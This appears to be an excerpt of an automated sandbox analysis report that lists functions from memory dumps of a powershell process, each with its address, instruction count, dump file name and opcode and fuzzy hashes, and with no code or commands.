                                          • Opcode ID: 664a6928af1469d431a2d5c5e5d37cd7ededb8f2a6c936795ba76995b77fdb00
                                          • Instruction ID: 091c0718ef1004ca685f810cb5c8654a96658ce6a521811e9c69b0b474336dc5
                                          • Opcode Fuzzy Hash: 664a6928af1469d431a2d5c5e5d37cd7ededb8f2a6c936795ba76995b77fdb00
                                          • Instruction Fuzzy Hash: F2F0A479611218CFCB29DF74D485898F7B2FF4832A76150ACD8066B361CB3AE861CF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626BA88 Relevance: .0, Instructions: 25COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1fad1c2d3ea60e2359acc6119ee68d12f3bf9f5b82d141c0e47bb3f0bc279e60
                                          • Instruction ID: 102b394353726179a7d06c713ce42a14b29bc90b7a5095ed9565d81522840870
                                          • Opcode Fuzzy Hash: 1fad1c2d3ea60e2359acc6119ee68d12f3bf9f5b82d141c0e47bb3f0bc279e60
                                          • Instruction Fuzzy Hash: E2F03931920219DBDB549F59C9197EEBBF5EB48301F14046AE802F3280CFB90D58CBE2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06268D91 Relevance: .0, Instructions: 24COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 05efdf9dd0ce9b391f0a6943777ce45396dd6a4057e84edb325bece0231c73eb
                                          • Instruction ID: e20886350d2811c7e0ceb11fe1a27af46c0d69e2bafe5a67d80b18b4d2cafbcd
                                          • Opcode Fuzzy Hash: 05efdf9dd0ce9b391f0a6943777ce45396dd6a4057e84edb325bece0231c73eb
                                          • Instruction Fuzzy Hash: 5DE0ED367001189F8B05DFA5E4008EEBBB1FF98262F008066E954DB110D7319A65DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06268800 Relevance: .0, Instructions: 24COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0666efe33a0945622b0cb041937d77c7b315da8b50415e220c6357a85c2dc2a
                                          • Instruction ID: 45e1a1dff11cdb1db3ed2bcae95cfd74151490ab55a3a270fc563409b993ffea
                                          • Opcode Fuzzy Hash: a0666efe33a0945622b0cb041937d77c7b315da8b50415e220c6357a85c2dc2a
                                          • Instruction Fuzzy Hash: 35E03070A042089BD745EFA4D81576E77E7DF84300F5084F8D90D97250EE351E019B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06265398 Relevance: .0, Instructions: 23COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 89ce546814ea0ff2791da8a813691727861570c3c7edef9101ac3ede32770a7f
                                          • Instruction ID: 1ca0ee852add410a387ab8ee9439ddbe6821579e246cdeb5ee18f28107899d30
                                          • Opcode Fuzzy Hash: 89ce546814ea0ff2791da8a813691727861570c3c7edef9101ac3ede32770a7f
                                          • Instruction Fuzzy Hash: 0AE0ECBAA04119AF96008A45EC44C67FFADFB896743154296F90897302C731FC81CBF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06261120 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d53a650a30f946ff0f44771a2190020e76b424ab31839d748e13ca47410cf80
                                          • Instruction ID: 95b862511af5bd79ae2dde07f6ab556e70cd0c68dfac1bfcd862d5c7c54ab0a5
                                          • Opcode Fuzzy Hash: 6d53a650a30f946ff0f44771a2190020e76b424ab31839d748e13ca47410cf80
                                          • Instruction Fuzzy Hash: D4D0C72130090867E304A2B9E89AB7F36DBCBC5361F000138C70AC7380EE29AC0207E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06268DE8 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17cdcb43c9fe550c827caa1fa6c46580f69831db2d785bfcd555899f9409fdd3
                                          • Instruction ID: 6d562da9d9a56f0344ab1953a652a6c003981fb4167bfe9b62896cf601f5ff44
                                          • Opcode Fuzzy Hash: 17cdcb43c9fe550c827caa1fa6c46580f69831db2d785bfcd555899f9409fdd3
                                          • Instruction Fuzzy Hash: 59E026B2908188CFCB110BA8EC008A83F30EA52242B44009BE540CB022D335C157DBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06276F50 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457549041.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6270000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4966c815bda56357fc127fcabe3887104809aaadf44ad72937474e4ae0f645a6
                                          • Instruction ID: 7c55d94a68e371906ae6744fdd45272e46fda4e053a4d1b12ec97bce93453fbc
                                          • Opcode Fuzzy Hash: 4966c815bda56357fc127fcabe3887104809aaadf44ad72937474e4ae0f645a6
                                          • Instruction Fuzzy Hash: B8D05B31E142156B5B159A6594154DE7FFAEB44161B104469EC05D2200EF316541C690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626476A Relevance: .0, Instructions: 18COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0a0788edcd609d2545d61bb0084d365dd51a1ef3631b59cb5e1a8746ddbf7e82
                                          • Instruction ID: 74243eb0f38a1188a26131358f48f61883be35f12d234ae1e60eb7a297169224
                                          • Opcode Fuzzy Hash: 0a0788edcd609d2545d61bb0084d365dd51a1ef3631b59cb5e1a8746ddbf7e82
                                          • Instruction Fuzzy Hash: 68D02B126095C04BC7529B29F4583D4EFB25F97670B0C80E6C4808F213C6224549D714
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626406A Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 31c63933fae5540bdffa12246352c48a0dc93452433cf69d190afc7d628d619d
                                          • Instruction ID: 50e26e508f204a85163210e93977746892d1fc96cb7241d685df61e62d2c2f9d
                                          • Opcode Fuzzy Hash: 31c63933fae5540bdffa12246352c48a0dc93452433cf69d190afc7d628d619d
                                          • Instruction Fuzzy Hash: CED023211000104FCB84C715E5017D1B795DF8B114F7CC087E40DC7306C135CC438790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06264740 Relevance: .0, Instructions: 13COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5999f799e412b6478f37c33fd957096fe31542efab24ccfa204bb6aab6d9993a
                                          • Instruction ID: 4ff6305ae526036ad473bb2811ec1c6ff92ba09446f2ab476c9b4f34a98f2e43
                                          • Opcode Fuzzy Hash: 5999f799e412b6478f37c33fd957096fe31542efab24ccfa204bb6aab6d9993a
                                          • Instruction Fuzzy Hash: 6FD0A9226482E08FCB06822864200E67FB1AB4A10131E84CBE844CB1A3C224CC8BC774
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06265E43 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 30b3d09e3ab66b1bf0a76f99778d369aad8b85d20a4763deeafc06a2511e54a6
                                          • Instruction ID: b28ea5cadc5010cd7500b694928913654d4ee68c0e476ac741dc463b8bd0e5f0
                                          • Opcode Fuzzy Hash: 30b3d09e3ab66b1bf0a76f99778d369aad8b85d20a4763deeafc06a2511e54a6
                                          • Instruction Fuzzy Hash: 25D0CA3BA00008AFCF009AC0E842ACDFF32FB88321F008022E6106A160C6B215A6DB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 062647C8 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 052c95e308e5a8da43433297983287bee8ac312241c13fdeaa582bfe935503d0
                                          • Instruction ID: 3b9d4503d0a5fda1d09840e754298864b09ae5b81a210aea013986e4098af112
                                          • Opcode Fuzzy Hash: 052c95e308e5a8da43433297983287bee8ac312241c13fdeaa582bfe935503d0
                                          • Instruction Fuzzy Hash: 9AC08C14108EC16BCB22C3288C83ACF1F602B02000F8D80DC88848F21BC214100DE329
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06263860 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 069fe0a187bddd4b766e84c7184a8bd1482f8b37c9c2670959e252ae643a6415
                                          • Instruction ID: 227f37d41ae7dd0efa89a253a1a7365c29506faa9f1715799ff29299596065e8
                                          • Opcode Fuzzy Hash: 069fe0a187bddd4b766e84c7184a8bd1482f8b37c9c2670959e252ae643a6415
                                          • Instruction Fuzzy Hash: 31C08C3AF410098FCB00CB95F8888DCF771FBC8225B00C423E10983101C7319021DB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0626479F Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 75504ab751d81f0a66e99c9ac09ce23e35b9b791f5b6f03f89165dec8c79792c
                                          • Instruction ID: f7cebe9c122a89adc1e877260959da43b02c90b053b8ddc0fa6e8b051147c6ae
                                          • Opcode Fuzzy Hash: 75504ab751d81f0a66e99c9ac09ce23e35b9b791f5b6f03f89165dec8c79792c
                                          • Instruction Fuzzy Hash: BFC08C24088FC02BCB24CA248C8B2CE3FA0AB0A000FCCC0DD8840CF243D318000BA249
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06262631 Relevance: .0, Instructions: 7COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000026.00000002.457457096.0000000006260000.00000040.00000800.00020000.00000000.sdmp, Offset: 06260000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_38_2_6260000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b7a1fb61ac9c9f8d6ed1dd85faa150d57c4bdef47b44fab6a109448bdd1fabf
                                          • Instruction ID: c5c2cf8e44ea8821b3f9929fd4ec99db5cd1133720ed8f2807f89f6832e1fc58
                                          • Opcode Fuzzy Hash: 7b7a1fb61ac9c9f8d6ed1dd85faa150d57c4bdef47b44fab6a109448bdd1fabf
                                          • Instruction Fuzzy Hash: E6C08C3208E280DFCB219AA08D09F4A3E206BE0702F07804DEB480A086D4214014FB22
                                          Uniqueness

                                          Uniqueness Score: -1.00%